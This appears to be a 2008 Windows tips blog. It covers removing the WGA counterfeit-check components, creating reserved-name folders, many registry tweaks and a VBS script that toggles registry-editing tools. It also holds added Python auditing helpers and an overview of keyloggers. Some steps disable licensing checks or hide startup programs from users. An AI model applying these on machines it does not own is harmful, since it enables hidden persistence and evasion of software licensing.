Sunday, December 28, 2008

Windows XP “you may be a victim of software counterfeiting”

After installing your genuine copy of Microsoft Windows XP you are prompted with a “Your software is counterfeit” error message at startup. Even after visiting the www.microsoft.com/genuine/ site and validating, you still get the above message popping up after 2 or 3 boots. There is an easy solution to this and I would like you to follow the steps below to fix the issue.

1. C:\Windows\Downloaded Program Files

  • Within that folder, remove any files or folders associated with .WGA

2. Safe Mode

  • Reboot your computer and, as soon as Windows logs off, start repeatedly tapping the F8 key on your keyboard.
  • As soon as you see the Windows Advanced Startup options, select Safe Mode. Within Safe Mode, go to these folders:
  • C:\Windows\System32 (Rename wgatray.exe to wgatrayold.exe)
  • C:\Windows\System32\dllcache (Rename wgatray.exe to wgatrayold.exe)
    Note: Dllcache is a hidden folder. To view hidden folders, go to Start, Control Panel, Folder Options,
    select the View tab and, under the Hidden Files option, select Show hidden files and folders.

3. Safe Mode Registry

  • Click on Start, Run and within the open dialog box type regedit and click OK.
  • Within the Registry Editor, navigate to
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WGALOGON
  • Right Click and Export the WGALOGON Folder (this should be saved onto your machine for backup purposes)
  • After Exporting the folder, DELETE the WGALOGON folder
  • After deleting close all applications and Restart your machine back to Normal Mode

4. www.microsoft.com/genuine

  • Get into the site above and manually re-validate your copy of Windows.
  • After being prompted with a successful validation, restart your machine.

Thursday, December 25, 2008

How to create CON folder

CON is a reserved word in the Windows operating system, which is why we cannot create a folder named CON.

But from the command prompt we can do this:

STEP1: go to the command prompt
STEP2: at the e:\> prompt, type "mkdir \\.\e:\con"
STEP3: verify by typing "dir \\.\e:\con"
STEP4: delete the file or folder with "rmdir \\.\e:\con"

The following file names in Windows are reserved because they represent devices:
con, con.* -> the console
prn, prn.* -> the default printer, as a character device
aux, aux.* -> the default serial terminal, as a character device
lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -> the parallel ports, as character devices
lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*
com1, com2, com3, com4, com5, com6, com7, com8, com9 -> the serial ports, as character devices
com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*
nul, nul.* -> the NUL or "waste bit bucket" or "black hole for bits" or "/dev/null" device

Such files are considered to "exist" in all directories, so if you have a filename like "c:\temp\con", you're talking about the CON device, not about a normal disk file called "con". They're not listed using the "dir" command, or using APIs.
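A defender-side check for the reserved names listed above, as an added example (not code from the original post): it flags path components that Windows would treat as devices, and paths that use the raw `\\.\` prefix from the steps above, which is what you want when validating untrusted filenames such as uploads or archive entries. The function names are illustrative, the trailing-space handling is a conservative assumption, and the `\\?\` prefix is checked alongside `\\.\`.

```python
import re

# Device names from the list above: con, prn, aux, nul, com1-9, lpt1-9.
DEVICE_NAMES = {"con", "prn", "aux", "nul"}
DEVICE_NAMES |= {f"com{i}" for i in range(1, 10)}
DEVICE_NAMES |= {f"lpt{i}" for i in range(1, 10)}

# Prefixes that bypass reserved-name handling, as in the mkdir step above.
RAW_PREFIXES = ("\\\\.\\", "\\\\?\\")


def device_name(component):
    """Return the device a single path component refers to, or None.

    "con" and "con.*" are both the device, so only the text before the
    first dot is compared. Trailing spaces are stripped as a conservative
    assumption, because the exact rules vary between Windows versions.
    """
    base = component.split(".", 1)[0].rstrip(" ").lower()
    return base if base in DEVICE_NAMES else None


def uses_raw_prefix(path):
    """True if the path starts with a prefix that skips name normalization."""
    return path.replace("/", "\\").startswith(RAW_PREFIXES)


def reserved_components(path):
    """List (component, device) pairs for every reserved component in path."""
    p = path.replace("/", "\\")
    for prefix in RAW_PREFIXES:
        if p.startswith(prefix):
            p = p[len(prefix):]
    hits = []
    for part in p.split("\\"):
        if not part or re.fullmatch(r"[A-Za-z]:", part):
            continue  # empty segment or a drive letter such as "e:"
        dev = device_name(part)
        if dev:
            hits.append((part, dev))
    return hits


def check_untrusted_path(path):
    """Return the reasons to reject path; an empty list means accepted."""
    reasons = []
    if uses_raw_prefix(path):
        reasons.append("raw device-namespace prefix")
    for part, dev in reserved_components(path):
        reasons.append(f"component {part!r} is the {dev.upper()} device")
    return reasons


if __name__ == "__main__":
    # Constructed sample inputs.
    samples = [r"c:\temp\con", "uploads/LPT1.pdf/report.txt",
               r"\\.\e:\con", r"c:\temp\console.log"]
    for s in samples:
        print(s, "->", check_untrusted_path(s) or "ok")
```
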

COMPLETE REGISTRY TRICKS

Monday, June 9, 2008

Compiled and written by WINDOWS TEAM

If you enjoy these hacks, or have any other hacks you would like to send me, my email is windowsfun@gmail.com.

*Note: Not all of these hacks will work for Windows NT. Also, make sure you back up your reg files, user.dat and system.dat before modifying. Have fun. =)

Adding an Application to the Context Menu of Every Folder

1. HKEY_CLASSES_ROOT \ Folder \ shell

2. Add a key named "NameOfApplication" (without quotes), whether it be Notepad, Calculator, etc.

3. Give it a default value of "NameOfApplication". This key can be named however you would like it to appear on the context menu.

4. Placing a '&' symbol in front of a character will allow you to use that character on the keyboard (the characters that are underlined).

5. HKEY_CLASSES_ROOT \ Folder \ shell \ NameOfApplication

6. Add a key named "command"

7. Give it a default value of the application you want to run. You must include the full path and file name.

8. The context menu of any folder should now include a command to open your application.

Adding Items to the Context Menu of the Start Button

1. HKey_Classes_Root / Directory / Shell

2. Create a new key in the 'Shell' folder

3. Type in a name for the key, does not matter what you call it

4. Modify the data for 'Default' and give it a name of whatever you would like to appear on the context menu.

5. Create another new key named "Command" (without the quotes) inside of the key you just created in #2.

6. For the 'Default' value data of 'Command', enter the full path and program you want to execute.

7. Now when you right click on the Start Button, your new program will show up.

Automatically Refresh Explorer; Explorer Refresh Rate

Explorer doesn't always automatically refresh its contents. You can modify the refresh rate of Explorer.

1. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update

2. Modify the 'UpdateMode' value from 01 to 00.

Changing Exchange's Mailbox Location

When you create a mailbox in Exchange for e-mail, you specify the location where you want your mail to go. You cannot change this in Exchange afterwards.

1. HKEY_CURRENT_USER \ Software \ Microsoft \ Windows Messaging Subsystem \ Profiles

2. Go to the profile you want to change

3. Go to the section that has the file location for your mailbox (*.PST) file in the right hand panel

4. Modify the data to the new file location

Changing the Registered Owner and Organization

1. HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion

2. Modify the data for the 'RegisteredOwner' value or for 'RegisteredOrganization'

Changing the Tips of the Day

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ explorer \ Tips

Changing the Location of Window's Installation Files

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Setup \ SourcePath

2. Modify the string 'SourcePath' to the location and directory of your choice

Changing the MaxMTU and other Network Settings

There are four network settings that can be configured to affect your bandwidth when dialing an ISP: MaxMTU, MaxMSS, DefaultRcvWindow, and DefaultTTL

MaxMTU and MaxMSS

1. Hkey_Local_Machine / System / CurrentControlset / Services / Class / netTrans / 000n (where n is your particular network adapter binding)

2. Create a new string named "MaxMTU" (without the quotes)

3. Modify its value to the number you want. Most people modify it to 576

4. You can also add a new string named "MaxMSS" and give it a value of 536

DefaultRcvWindow and DefaultTTL

1. HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ VxD \ MSTCP

2. Create a new string named "DefaultRcvWindow" (without the quotes) and modify its value to 2144

3. Create a new string named "DefaultTTL" and modify its value to 60-64

Changing the Telnet Scroll-Back Buffer Size

By default, the Telnet program has a window size of 25 lines. To increase the number of lines you can scroll back, do the following.

1. HKEY_CURRENT_USER \ Software \ Microsoft \ Telnet

2. Modify the string 'Rows' to the desired value of your choice

Changing your Modem's Initialization String

1. HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ Class \ Modem \ 0000 \ Init

2. Change the settings to the new values

Clearing the Documents Menu Automatically

The Documents Menu on your Start Menu displays recently opened files. You can have the Registry clear the contents of this list every time Windows starts. Only do #1 if you are comfortable with not being able to store files in your Recycle Bin. This mod tells Windows to store the shortcuts it makes to recent documents in the Recycle Bin, thus deleting them.

1. Set the properties on the Recycle Bin to delete files immediately.

2. HKey_Current_User \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ User Shell Folders

3. If there is no string named 'Recent', create a new string named "Recent"

4. Modify its value to C:\RECYCLED

Compacting the Registry

1. Exit to DOS, **Not a DOS box**

2. Run the Registry Editor (yes, run it in DOS), and then export the entire Registry to COMPACT.REG.

3. Exit Regedit and run it again with the following switch: REGEDIT /C COMPACT.REG

Creating a Default File Opener

If you have an unregistered file type you wish to open with Notepad, you can add Notepad to the Context Menu of unregistered file types.

1. HKEY_CLASSES_ROOT / Unknown / Shell

2. Create a new key named "Notepad" (without the quotes)

3. Create a new key under 'Notepad' named "Command" (without the quotes)

4. Modify the 'Default' value data for 'Command' to the path and filename of Notepad: C:\WINDOWS\NOTEPAD.EXE %1

5. This modification will work with any program

Creating a Network Logon Banner

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Winlogon

2. Create a new String named "LegalNoticeCaption" (without the quotes)

3. Modify this string's value data to whatever you would like the text to be

Deleting Registry Keys from the Command Line

1. Exit to DOS, **Not a DOS box**

2. The syntax is: "REGEDIT /L:system.dat_location /R:user.dat_location /D Reg_Key" where Reg_Key is the key you want to delete

Disable Password Caching

1. Create a new text document named "Disable.REG" (without the quotes)

2. Edit this new document in Notepad or any ASCII text editor and insert the following text:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network]

"DisablePwdCaching"=dword:00000001

3. Either double-click on this new file in Explorer and merge it into the Registry, or open a DOS box and type REGEDIT DISABLE.REG

Disabling Drives in My Computer

This modification will remove all drives, local and network, from Explorer's view.

1. HKey_Current_User \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer

2. Create a DWORD item and name it "NoDrives" (without the quotes)

3. Modify its value to "3FFFFFF"

Disabling Run and Find from the Start Menu

This modification will remove the Run or Find option on the Start Menu.

1. HKey_Current_User \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer

2. Create a new DWORD item and name it either "NoFind" or "NoRun" (without the quotes)

3. Modify its value to "1"

Disabling File and Print Sharing

This modification will deny network access to local printers or shared files.

1. HKey_Local_Machine \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Network

2. Create a new DWORD Value and name it either "NoPrintSharing" or "NoFileSharing"

3. Modify its value to "1"

Disabling My Computer from the Desktop

This modification is good for administration of multiple users to prevent access to drives, the Control Panel, etc. After completing this modification, clicking on My Computer will do nothing. You may want to export this section if you wish to restore it later.

1. Search for "20D04FE0-3AEA-1069-A2D8-08002B30309D" (without the quotes)

2. This should be the HKey_Classes_Root \ CLSID section

3. Delete the entire section. Yes, you read right.

Disabling the Right-Click on the Start Button

This modification is good for administration of multiple users. After completing this modification, right-clicking the Start button will do nothing. This also disables use of the Windows key in conjunction with the E (Explorer) and F (Find) keys on some newer keyboards. You may want to export these two sections if you wish to restore them later.

1. HKey_Classes_Root \ Directory \ Shell

2. Expand section 'Shell' so that you see the folder 'Find'

3. Delete 'Find' along with all of its contents

4. HKey_Classes_Root \ Folder

5. Expand section 'Folder'

6. Delete 'Explore' and 'Open' along with all of their contents

Displaying Hi-Color Icons without the Plus Pack

1. HKEY_CURRENT_USER \ Control Panel \ desktop \ WindowMetrics

2. Create or edit the string 'Shell Icon BPP'

3. Modify its value data to a number representing the color depth you wish. This number is in bits, not colors. BPP stands for Bits Per Pixel

4. The default is 8-bit (256 colors)

Easily Opening any File with Notepad (Context Menu)

This modification will enable the context menu with the option to open the file with Notepad.

1. HKEY_CLASSES_ROOT \ *

2. Create a new key under '*' named "Shell" (without the quotes)

3. Create a new key under 'Shell' named "Open" (without the quotes)

4. Modify the string 'Default' inside of 'Open' to whatever you would like to appear on the context menu, e.g. "Open With Notepad" (without the quotes)

5. Create a new key under 'Open' named "Command" (without the quotes)

6. Modify the string 'Default' inside of 'Command' to "C:\WINDOWS\NOTEPAD.EXE %1" (without the quotes)

Enable Explorer Thumbnails of Bitmaps

This modification will allow Explorer to show thumbnails of bitmap files (*.bmp) as icons.

1. HKey_Classes_Root \ Paint.Picture \ DefaultIcon

2. Edit the string named 'Default' to value data of "%1" (without the quotes)

Fixing a Corrupt Registry

If your registry has become corrupted, and re-installing Windows over your existing installation does not fix the problem, there is a hidden, read-only, system file on the root of your boot drive called SYSTEM.1ST. This is the initial system registry created when you first installed Windows. To use this file:

1. In DOS, go to your Windows directory.

2. Strip the attributes of your current SYSTEM.DAT with the following syntax: ATTRIB -r -s -h SYSTEM.DAT

3. Copy C:\WINDOWS\SYSTEM.DAT to SYSTEM.BAD as a backup

4. Switch down to the root directory of the drive Windows is installed on.

5. Strip the attributes of SYSTEM.1ST with the following syntax: ATTRIB -r -s -h SYSTEM.1ST

6. Copy SYSTEM.1ST to C:\WINDOWS\SYSTEM.DAT

This is a last-minute fix for the Registry. It will not restore any information about your 32-bit apps, so you will need to reinstall them or any other programs that modified your system registry. 16-bit apps do not modify the registry, so those should be able to remain in place. To avoid this problem, you need to back up your registry on a regular basis!

Get Your Folders to Open the Way You Want Every Time

1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

2. Modify the string 'NoSaveSettings' to a value of 1

Getting Rid of Schemes

1. Open up Display Control Panel.

2. Switch to the Appearance tab.

3. Determine which schemes you wish to delete.

4. If you wish to delete them all, you should create one as a backup.

5. HKEY_CURRENT_USER \ Control Panel \ Appearance \ Schemes

6. Right-click each scheme you wish to delete and click delete. DO NOT DELETE "Default"

Getting Rid of or Editing Startup Tips

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ explorer \ Tips

2. You can edit or delete the tips of your choice

Increasing the Modem Timeout

1. HKEY_LOCAL_MACHINE / System / CurrentControlSet / Services / Class / Modem / XXXX / Settings (XXXX = number of your modem)

2. Modify the string 'Inactivity Timeout' to the number of minutes you wish for the modem to wait on file transfers before timing out.

Internet Explorer's Bitmap Toolbar Background; How to Change it

1. HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer / Toolbar

2. Modify the string 'BackBitmap' to contain the path and filename of the bitmap you wish to use (must be a bmp)

3. If this string does not exist, create one.

Modifying Default Desktop Icons

This can be done to many if not all of your default desktop icons

My Computer Icon

1. Search the registry for "My Computer" or "20D04FE0-3AEA-1069-A2D8-08002B30309D" (without the quotes)

2. Modify the string 'Default Icon' to contain the path and filename of the file containing the icon you want to use, followed by the icon number (starts at 0)

The above steps should also work for:

Network Neighborhood - HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}

InBox - HKEY_CLASSES_ROOT\CLSID\{00020D75-0000-0000-C000-000000000046}

Recycle Bin - HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}

Additional icons can be found in:

WINDOWS\MORICONS.DLL

WINDOWS\SYSTEM\PIFMGR.DLL

WINDOWS\SYSTEM\SHELL32.DLL

Modifying Icon Cache Size

The default cache size for icons is set at 512, so when the number of icons exceeds this number, it uses the page file for storage.

1. HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / Explorer

2. Create a new string named "MaxCacheIcons"

3. Modify this string to contain a value that suits your needs. I've heard of 4000 being used; I don't think my computer encounters that many icons in one session!

Not Displaying the Network Neighborhood

1. HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / Explorer

2. Create a new DWORD named "NoNetHood" (without the quotes)

3. Modify this new DWORD to a value of 1

Not Saving Settings on Exit

1. HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / Explorer

2. Create a new DWORD named "NoSaveSettings" (without the quotes)

3. Modify this new DWORD to a value of 1

Opening Explorer from My Computer

By default, double-clicking 'My Computer' gives you a window containing your drives, control panel, etc. If you would rather have Explorer open when you double-click 'My Computer', do the following:

1. Search for "My Computer" or "20D04FE0-3AEA-1069-A2D8-08002B30309D" (without the quotes)

2. This should bring you to HKEY_CLASSES_ROOT / CLSID

3. Expand the key {20D04FE0-3AEA-1069-A2D8-08002B30309D}

4. Create a new key under the 'Shell' key and name it "Open"

5. Create a new key under 'Open' named "Command"

6. Modify the 'Default' string under command and give it a value of "Explorer.exe" (without the quotes)

7. If you wish to undo this change, delete the 'Open' key and all of its contents

Recycle Bin Edits

Modify the context menu of the Recycle Bin

HKEY_CLASSES_ROOT \ CLSID \ {645FF040-5081-101B-9F08-00AA002F954E} \ ShellFolder

Bin Value: "Attributes"=hex:50,01,00,20 ... adds 'Rename' to the menu

Bin Value: "Attributes"=hex:60,01,00,20 ... adds 'Delete' to the menu

Bin Value: "Attributes"=hex:70,01,00,20 ... adds 'Rename' and 'Delete' to the menu

Bin Value: "Attributes"=hex:40,01,01,20 ... standard shortcut arrow

Bin Value: "Attributes"=hex:40,01,02,20 ... another shortcut arrow

Bin Value: "Attributes"=hex:40,01,04,20 ... and another shortcut arrow

Bin Value: "Attributes"=hex:40,01,08,20 ... make it look disabled or cut

Bin Value: "Attributes"=hex:41,01,00,20 ... copy

Bin Value: "Attributes"=hex:42,01,00,20 ... cut

Bin Value: "Attributes"=hex:43,01,00,20 ... copy cut

Bin Value: "Attributes"=hex:44,01,00,20 ... paste

Bin Value: "Attributes"=hex:45,01,00,20 ... copy paste

Bin Value: "Attributes"=hex:46,01,00,20 ... cut paste

Bin Value: "Attributes"=hex:47,01,00,20 ... copy cut paste

Removing Items from NEW on the Desktop Context Menu

1. Search for the string 'ShellNew'

2. This should bring you to HKEY_CLASSES_ROOT

3. For the items you want to remove, simply rename the 'ShellNew' command, as renaming it is safer than deleting

4. Continue searching for the items you want to remove

5. Be sure they all fall under HKEY_CLASSES_ROOT

Removing Open, Explore & Find from Start Button

1. HKEY_CLASSES_ROOT \ Directory \ Shell

2. Delete the key 'Find'

3. HKEY_CLASSES_ROOT \ Folder \ Shell

4. Delete the keys 'Explore' and 'Open'

Note: - When you remove Open, you cannot open any folders

Removing Programs listed from the Control Panel's Add/Remove Programs Section

If you delete an installed program and its files, it may or may not remain in the 'Add/Remove Programs' Control Panel. In order to remove such programs from the list, do the following:

1. HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Uninstall

2. Delete the keys or strings for programs you do not want to appear in the list

3. This will only delete them from the list, it will not delete the actual programs.

Removing Sound Events from the Sounds Control Panel

This modification will delete actual events such as 'Asterisk' or 'Critical Stop'. This does not unassign any sounds related to events.

1. HKEY_CURRENT_USER / AppEvents / Schemes / Apps

2. From here you can delete any items you don't want to show or no longer need

Removing the Shortcut Arrows

1. HKEY_CLASSES_ROOT / LNKFILE

2. Delete the string 'IsShortcut'

3. HKEY_CLASSES_ROOT / PIFFILE

4. Delete the value IsShortcut

Removing Unwanted Items from the RUN Menu

1. Search the registry for the word 'RUNMRU'

2. Delete the strings you don't want

3. Rename all of the strings so they are all in alphabetical order

User Restrictions without running Poledit

You can create user restrictions by modifying the Registry directly and not using the Policy Editor (poledit.exe).

1. HKEY_Current_User / Software / Microsoft / Windows / CurrentVersion / Policies

2. There should already be at least an 'Explorer' key

3. Additional keys that can be created under Policies are 'System', 'Network' and 'WinOldApp'

4. The list below explains what restrictions can be set under the keys Explorer, System, Network, and WinOldApp.

5. They are all DWORDs and consist of a value of '1'

Explorer:

NoDeletePrinter - Disables Deletion of Printers

NoAddPrinter - Disables Addition of Printers

NoRun - Disables Run Command

NoSetFolders - Removes Folders from Settings on Start Menu

NoSetTaskbar - Removes Taskbar from Settings on Start Menu

NoFind - Removes the Find Command

NoDrives - Hides Drives in My Computers

NoNetHood - Hides the Network Neighborhood

NoDesktop - Hides all items on the Desktop

NoClose - Disables Shutdown

NoSaveSettings - Don't save settings on exit

DisableRegistryTools - Disable Registry Editing Tools - NOTE: Be Careful of this one

NoRecentDocsHistory - Removes Recent Document from Start Menu

ClearRecentDocsOnExit - Clears the Recent Documents when you Exit

NoInternetIcon - Removes the Internet Icon from the Desktop

System:

NoDispCPL - Disable Display Control Panel

NoDispBackgroundPage - Hide Background Page

NoDispScrSavPage - Hide Screen Saver Page

NoDispAppearancePage - Hide Appearance Page

NoDispSettingsPage - Hide Settings Page

NoSecCPL - Disable Password Control Panel

NoPwdPage - Hide Password Change Page

NoAdminPage - Hide Remote Administration Page

NoProfilePage - Hide User Profiles Page

NoDevMgrPage - Hide Device Manager Page

NoConfigPage - Hide Hardware Profiles Page

NoFileSysPage - Hide File System Button

NoVirtMemPage - Hide Virtual Memory Button

Network:

NoNetSetupSecurityPage - H

NoNetSetup - Disable the Network Control Panel

NoNetSetupIDPage - Hide Identification Page

NoNetSetupSecurityPage - Hide Access Control Page

NoFileSharingControl - Disable File Sharing Controls

NoPrintSharing - Disable Print Sharing Controls

WinOldApp:

Disabled - Disable MS-DOS Prompt

NoRealMode - Disables Single-Mode MS-DOS

Saving Desktop Settings

This explains how to tell Windows to remember such settings as window size, position, icon arrangement, etc.

1. HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer

2. Delete the "NoSaveSettings" string.

3. HKEY_USERS \ QWERT \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer

4. Where QWERT is your password profile

Setting the Minimum Password Length

1. HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Network

2. Create a new Bin Value named "MinPwdLen" (without the quotes)

3. Assign it the value you wish to be the minimum password length, as a number of characters

Specifying programs to run every time Windows

We all know that you can place shortcuts to programs in the Startup folder of your Start Menu in order to have that program start on Windows load, or place a run=path/filename or load=path/filename line in your win.ini. However, you may wish for users to not be able to change whether these programs run or not. Unless they are advanced users, you can hide these programs from them by placing commands in the Registry to run the programs on Windows load.

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run

OR HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce

OR HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunServices

2. Create a new string and name it whatever you like.

3. Edit the new string's value to contain the path and filename of the program or registered file type you wish to load at Windows startup.
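Because entries under these keys run without appearing in the Startup folder, they are worth reviewing whenever a machine is audited. The following added example (not part of the original post) parses text in the REGEDIT4 export format shown earlier on this page and lists every Run/RunOnce/RunServices command and every Policies restriction set to 1. The sample export, its program names and the function names are constructed for illustration.

```python
import re

# Constructed sample export (not taken from a real machine).
SAMPLE_EXPORT = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"updater"="C:\\TEMP\\upd.exe /quiet"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoDrives"=dword:00000000
'''

# The three autorun keys named in the steps above, lower-cased for matching.
AUTORUN_SUFFIXES = tuple(
    "\\microsoft\\windows\\currentversion\\" + k
    for k in ("run", "runonce", "runservices")
)
POLICY_MARKER = "\\currentversion\\policies\\"

# A value line is  "name"=data  or  @=data  (the key's default value).
_VALUE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(quoted):
    """Strip the surrounding quotes and undo .reg backslash escaping."""
    return re.sub(r"\\(.)", r"\1", quoted[1:-1])


def parse_reg(text):
    """Parse REGEDIT4 text into {key_path: {value_name: data}}.

    Strings become str, dword becomes int, hex becomes bytes.
    """
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):        # hex data continued on the next line
            pending = line[:-1]
            continue
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
            continue
        m = _VALUE.match(line)
        if current is None or not m:
            continue                   # "REGEDIT4" header or unrecognised line
        name = "" if m.group(1) == "@" else _unescape(m.group(1))
        data = m.group(2)
        if data.startswith('"'):
            current[name] = _unescape(data)
        elif data.lower().startswith("dword:"):
            current[name] = int(data[6:], 16)
        elif data.lower().startswith("hex"):
            hexpart = data.split(":", 1)[1]
            current[name] = bytes(int(b, 16) for b in hexpart.split(",") if b.strip())
    return keys


def autoruns(keys):
    """Return (key, value_name, command) for each Run/RunOnce/RunServices entry."""
    found = []
    for key, values in keys.items():
        if key.lower().endswith(AUTORUN_SUFFIXES):
            for name, data in values.items():
                if isinstance(data, str):
                    found.append((key, name, data))
    return found


def active_policies(keys):
    """Return (section, value_name) for each Policies value that is set to 1."""
    found = []
    for key, values in keys.items():
        low = key.lower()
        if POLICY_MARKER in low:
            section = key[low.index(POLICY_MARKER) + len(POLICY_MARKER):]
            for name, data in values.items():
                if data == 1:
                    found.append((section, name))
    return found


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_EXPORT)
    for key, name, cmd in autoruns(parsed):
        print("autorun:", name, "->", cmd)
    for section, name in active_policies(parsed):
        print("policy :", section, name)
```
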

Stuck Program Timeout Value

This modification can be helpful if you are running unstable programs or an unstable machine. This modification changes the amount of time Windows waits before considering a program 'Not Responding'.

1. HKEY_CURRENT_USER / Control Panel / Desktop

2. Create a new string named 'HungUpTimeOut' (without the quotes)

3. Modify the new string's value to 1-10000

4. This value is in milliseconds

To speed up the Start Menu

1. Search the registry for the word desktop

2. This should bring you to HKEY_CLASSES_ROOT / CLSID / {00021400...

3. Create a new string named "MenuShowDelay" (without the quotes)

4. Edit the new string to a value from 1-10, where 1 is the fastest

Turn Off Window Animation

You can turn off the animation displayed when you minimize and maximize windows with this modification.

1. HKEY_CURRENT_USER \ Control panel \ Desktop \ WindowMetrics

2. Create a new string named "MinAnimate"

3. Modify the new string's value for 0 or 1

4. 0 = Off and 1 = On

Wait to Kill Frozen Program Value

This modification changes the amount of time Windows will wait before force quitting an application, whether it is 'Not Responding' or not, after telling Windows to 'End Task' in the CTRL+ALT+DEL dialog box.

1. HKEY_CURRENT_USER \ Control Panel \ Desktop

2. Create a new string named "WaitToKillAppTimeout" (without the quotes)

3. Modify the new string to a value 1-20000

4. This value is in milliseconds

Enable/Disable Registry Editing tools

'Enable/Disable Registry Editing tools
'© Joji - rev 12/06/99
Option Explicit

'Declare variables
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype

Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"
p = p & "DisableRegistryTools"
itemtype = "REG_DWORD"
mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"
enab = "ENABLED"
disab = "DISABLED"
jobfunc = "Registry Editing Tools are now "

'This section tries to read the registry key value. If not present an
'error is generated. Normal error return should be 0 if value is
'present
t = "Confirmation"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
'Save the error number before On Error Goto 0 resets the Err object
errnum = Err.Number
On Error Goto 0

If errnum <> 0 Then
'Create the registry key value for DisableRegistryTools with value 0
WSHShell.RegWrite p, 0, itemtype
n = 0
End If

'If the key is present, or was created, it is toggled
'Confirmations can be disabled by commenting out
'the two MyBox lines below
If n = 0 Then
n = 1
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
ElseIf n = 1 Then
n = 0
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & enab & vbCR & mustboot, 4096, t)
End If



Create Notepad.txt, copy and paste this content into it in Notepad, and save it with a .vbs extension (Notepad.vbs). Then double-click on it. A message will appear: if your regedit is enabled, it will be disabled; if your regedit is disabled, it will be enabled.

Thursday, December 11, 2008

Keystroke logging

Keystroke logging (often called keylogging) is a method of capturing and recording user keystrokes. The technique and name came from before the era of the graphical user interface; loggers nowadays would expect to capture mouse operations too. Keylogging can be useful to determine sources of errors in computer systems, to study how users interact with and access systems, and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for both law enforcement and law-breaking, for instance providing a means to obtain passwords or encryption keys and thus bypassing other security measures. Keyloggers are widely available on the Internet.

There are currently two types of keylogging methods, hardware and software based.

Application

Keystroke logging can be achieved by both hardware and software means. Hardware key loggers are commercially available devices which come in three types: inline devices that are attached to the keyboard cable, devices which can be installed inside standard keyboards, and actual replacement keyboards that contain the key logger already built-in. The inline devices have the advantage of being able to be installed instantly on desktop computers without integrated keyboards.

When used covertly, inline devices are easily detected by a glance at the keyboard connector plugged into the computer. Of the three types, the most difficult to install is also the most difficult to detect. The device that installs inside a keyboard (presumably the keyboard the target has been using all along) requires soldering skill and extended access to the keyboard to be modified. However, once in place, this type of device is virtually undetectable unless specifically looked for.

Types of keystroke loggers

1) Local Machine software Keyloggers are software programs that are designed to work on the target computer’s operating system. From a technical perspective there are four categories:

  • Hypervisor-based: The keylogger resides in a malware hypervisor running underneath the operating system, which remains untouched, except that it effectively becomes a virtual machine. See Blue Pill for a conceptual example.
  • Kernel based: This method is difficult both to write and to combat. Such keyloggers reside at the kernel level and are thus difficult to detect, especially for user-mode applications. They are frequently implemented as rootkits that subvert the operating system kernel and gain unauthorized access to the hardware which makes them very powerful. A keylogger using this method can act as a keyboard driver for example, and thus gain access to any information typed on the keyboard as it goes to the operating system.
